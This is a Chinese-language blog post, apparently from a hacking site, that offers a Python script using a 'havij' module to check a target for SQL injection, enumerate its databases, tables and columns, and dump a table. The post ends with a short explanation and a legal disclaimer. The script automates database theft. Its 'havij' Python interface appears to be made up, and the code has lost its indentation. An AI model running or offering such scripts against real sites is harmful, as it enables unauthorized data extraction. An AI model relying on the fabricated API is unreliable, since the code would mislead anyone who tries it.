```python
import requests
from havij import Havij
url = "http://example.com"
db_name = "example_db"
havij = Havij(url)
if havij.is_vulnerable():
print("Target is vulnerable to SQL injection!")
dbs = havij.get_databases()
print(f"Databases: {dbs}")
if db_name in dbs:
havij.use_database(db_name)
print(f"Switched to database: {db_name}")
tables = havij.get_tables()
print(f"Tables in {db_name}: {tables}")
table_name = tables[0]
columns = havij.get_columns(table_name)
print(f"Columns in {table_name}: {columns}")
data = havij.dump_table(table_name)
print(f"Data in {table_name}: {data}")
else:
print(f"Database '{db_name}' not found.")
else:
print("Target is not vulnerable to SQL injection.")
```
在这个脚本中,我们首先导入了`requests`库和`Havij`类。然后,我们设置了目标URL和要操作的数据库名。
接下来,我们创建了一个`Havij`对象并检查目标是否易受SQL注入攻击。如果存在漏洞,我们首先获取所有数据库名,然后切换到指定的数据库。之后,我们获取该数据库中的所有表名,并选择一个表来获取其列名。最后,我们读取该表中的数据并打印出来。
请注意,这个脚本只是一个示例,实际使用时可能需要根据具体情况进行调整。此外,进行渗透测试时应始终遵守相关法律法规,并获得目标系统的授权。
本文由作者笔名:黑客网 于 2024-07-06 23:18:02发表在本站,原创文章,禁止转载,文章内容仅供娱乐参考,不能盲信。
本文链接: https://blog.xn--ubt767m.wang/wen/7244.html
上一篇
SQLMap高级技巧分享
下一篇
SQL注入漏洞修复方法